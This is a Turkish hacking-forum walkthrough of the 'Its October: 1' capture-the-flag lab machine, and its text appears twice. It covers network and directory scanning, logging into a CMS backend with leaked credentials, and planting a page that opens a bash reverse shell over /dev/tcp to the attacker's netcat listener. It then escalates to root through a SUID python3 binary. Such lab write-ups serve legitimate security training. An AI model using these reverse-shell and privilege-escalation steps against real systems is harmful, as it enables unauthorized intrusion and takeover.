- 1 Ağu 2012
- 27
- 0
Merhabalar TürkHackTeam ailesi, bugün sizlere "Its October: 1 Zafiyetli Makinesinin Çözümünü" göstereceğim.
Öncelikle zafiyetli makinemizi buradan indirelim
BURADAN
Makine adı: Its October: 1
Hedef: Hedefin kök bayrağını alın.
Zorluk: Kolay / Orta Seviye
İşletim Sistemi : Linux
Yayınlanma tarihi : 8 Nis 2020
Yapımcı : Akanksha Sachin Verma
Evet arkadaşlar açıklamaları da yaptığımıza göre başlayalım.
İlk önce makinenin ip adresini öğrenelim. Bunun için
( tüm ipleri tarıyoruz) yazıyoruz.
Görüldüğü üzere hedef makine 10.0.2.4 ipsine sahip, birde nmap aracımızı kullanarak açık port taraması yapalım.
Bunun için
yazalım.
Tarama bittikten sonra görüyoruz ki Port 22 ssh / Port 80 http / Port 3306 MySQL / Port 8080 apache tomcat portları açık.
Bir web sitesi bandırıldığı düşünerek
adresine gittim.
Sayfa kaynağını incelediğimde burada pek bir bilgi edinemediğimi fark ettim, ardından 8080 portuna yöneldim.
ve gelen sayfayı inceledim.
Buraya geldiğimde sayfa kaynağı incelediğimde ilk ipucumuzu bulduk mynote.txt adında bir dosya gördüm bakalım bize ne verecek.
yazıp enter dediğimizde bize bir kullanıcı adı ve şifre veriyor.
Şimdi anlıyorum ki bir admin paneli var onu bulmalıyız.
Öncelikle sayfamızın bütün dizinlerini taramalıyız. Bunun için terminalde
yazalım ve taramayı başlatalım.
Tarama yaparken bulunan dizinleri denediğim için 2 dizinde giriş ekranını buldum.
yazalım.
Biraz incelediğimizde içerek yönetim paneli olduğu fark ediyoruz. Bulduğum şifreler ile giriş yapalım ve inceleyelim.
Resimde de görüldüğü üzere bir sayfa ekleyebiliyoruz. Lakin bizden sunucuya erişim isteniyor bunun için reverse Shell yapabiliriz. Cms sekmesin Add yazan yere tıklayıp yeni sayfa oluşturalım ve size vereceğim kodları yazalım.
İp adresi yazan yere kendi ipimizi ve dinleyeceğimiz portu yazıyoruz.
İp adresimizi bilmiyorsak öğrenmek için yeni terminal açıp ifconfig yazmamız yeterli.
İnet yazan yerin yanında ip adresimiz yazmaktadır.
Sayfaya bir isim koyup kaydelim ben sayfa adını bash yaptım.
Ben 1234 portuna bağladım, netcat ile 1234 portunu dinlemeye başlayalım. Bunun için yeni terminal açıp
yazalım.
Ve dinlemeye başladık. Yeni oluşturduğumuz sayfayı açalım.
bash yazıyorum çünkü sayfa adını öyle yapmıştım. Sizde koyduğunuz sayfa adını yazınız.
Ve ilk bağlantımızı sağlıyoruz.
komutu yazalım bir deneme amaçlı.
Gördüğünüz gibi TERM environment variable not set. Yazıyor yani ortam değişkeni ayarlanmadı diyor. Ayarlamak içinse
yazalım ve ardından clear ve ls la yazalım.
Eğer ekranınız böyleyse sorun yoktur. Devam edelim. Şimdi
yazıp home klasörüne gidelim ardından
yazalım.
İşlemlere devam edelim ve
yazarak armour klasörüne gidelim ve orada ls la yapıp içeriği görelim.
İstediğimiz klasörlere ulaşamadık maalesef. Birde arama yöntemini deneyelim önce
yazalım ardından da
komutunu girelim
Evet görüldüğü üzere python 3.7 yüklü sunucumuzda artık yetki yükseltme yapalım. Ve kendimizi root konumuna getirelim.
Öncelikle clear yaparak terminali temizleyelim. Daha sonra ise
komutlarını yazalım id diyerek öğrenelim.
yazarak daha devam ediyoruz.
komutlarını yazıyoruz. Bu komutla birlikte non-interactive bir shelli interactive bir shelle çevirme işlemini yapıyoruz. Ve bu komutu doğru yaptıysanız ekranınız bu şekilde olmalı.
Burada tekrardan
komutu çalıştırıyoruz. Ardından
yazarak root klasörüne geçiş yapıyoruz.
Evet beklenen an geldi son olarak
komutunu çalıştırıyoruz. Hemen ardından
diyerek flagımızı alıyoruz.
Uzun bir konu oldu arkadaşlar. Siber güvenlik alanında daha çok yeniyim. Bazı hatalarım olduysa kusura bakmayın. Bir sonra ki konularda tekrardan görüşmek dileğiyle.
Öncelikle zafiyetli makinemizi buradan indirelim
BURADAN
Makine adı: Its October: 1
Hedef: Hedefin kök bayrağını alın.
Zorluk: Kolay / Orta Seviye
İşletim Sistemi : Linux
Yayınlanma tarihi : 8 Nis 2020
Yapımcı : Akanksha Sachin Verma
Evet arkadaşlar açıklamaları da yaptığımıza göre başlayalım.
İlk önce makinenin ip adresini öğrenelim. Bunun için
Kod:
Netdiscover r 10.0.2.0/24
Görüldüğü üzere hedef makine 10.0.2.4 ipsine sahip, birde nmap aracımızı kullanarak açık port taraması yapalım.
Bunun için
Kod:
Nmap A 10.0.2.4
Tarama bittikten sonra görüyoruz ki Port 22 ssh / Port 80 http / Port 3306 MySQL / Port 8080 apache tomcat portları açık.
Bir web sitesi bandırıldığı düşünerek
Kod:
http://10.0.2.4
Sayfa kaynağını incelediğimde burada pek bir bilgi edinemediğimi fark ettim, ardından 8080 portuna yöneldim.
Kod:
http://10.0.2.4:8080
Buraya geldiğimde sayfa kaynağı incelediğimde ilk ipucumuzu bulduk mynote.txt adında bir dosya gördüm bakalım bize ne verecek.
Kod:
http://10.0.2.4:8080/mynote.txt
Şimdi anlıyorum ki bir admin paneli var onu bulmalıyız.
Öncelikle sayfamızın bütün dizinlerini taramalıyız. Bunun için terminalde
Kod:
dirb http://10.0.2.4
Tarama yaparken bulunan dizinleri denediğim için 2 dizinde giriş ekranını buldum.
Kod:
http://10.0.2.4/backend
Biraz incelediğimizde içerek yönetim paneli olduğu fark ediyoruz. Bulduğum şifreler ile giriş yapalım ve inceleyelim.
Resimde de görüldüğü üzere bir sayfa ekleyebiliyoruz. Lakin bizden sunucuya erişim isteniyor bunun için reverse Shell yapabiliriz. Cms sekmesin Add yazan yere tıklayıp yeni sayfa oluşturalım ve size vereceğim kodları yazalım.
İp adresi yazan yere kendi ipimizi ve dinleyeceğimiz portu yazıyoruz.
Kod:
function onstart(){
exec("/bin/bash -c 'bash -i >& /dev/tcp/ip_adresi/port 0>&1'");
}
İnet yazan yerin yanında ip adresimiz yazmaktadır.
Sayfaya bir isim koyup kaydelim ben sayfa adını bash yaptım.
Ben 1234 portuna bağladım, netcat ile 1234 portunu dinlemeye başlayalım. Bunun için yeni terminal açıp
Kod:
nc lvp 1234
Ve dinlemeye başladık. Yeni oluşturduğumuz sayfayı açalım.
Kod:
http://10.0.2.4/bash
Ve ilk bağlantımızı sağlıyoruz.
Kod:
clear
Gördüğünüz gibi TERM environment variable not set. Yazıyor yani ortam değişkeni ayarlanmadı diyor. Ayarlamak içinse
Kod:
export TERM=screen
Eğer ekranınız böyleyse sorun yoktur. Devam edelim. Şimdi
Kod:
cd /home
Kod:
ls la
İşlemlere devam edelim ve
Kod:
cd armour
İstediğimiz klasörlere ulaşamadık maalesef. Birde arama yöntemini deneyelim önce
Kod:
clear
Kod:
find / -perm -u=s -type f 2>/dev/null
Evet görüldüğü üzere python 3.7 yüklü sunucumuzda artık yetki yükseltme yapalım. Ve kendimizi root konumuna getirelim.
Öncelikle clear yaparak terminali temizleyelim. Daha sonra ise
Kod:
python3 -c 'import os;os.execl("/bin/bash", "bash", "-p")'
Kod:
clear
Kod:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Burada tekrardan
Kod:
python3 -c 'import os;os.execl("/bin/bash", "bash", "-p")'
Kod:
cd /root
Evet beklenen an geldi son olarak
Kod:
ls
Kod:
cat proof.txt
Uzun bir konu oldu arkadaşlar. Siber güvenlik alanında daha çok yeniyim. Bazı hatalarım olduysa kusura bakmayın. Bir sonra ki konularda tekrardan görüşmek dileğiyle.
Son düzenleme: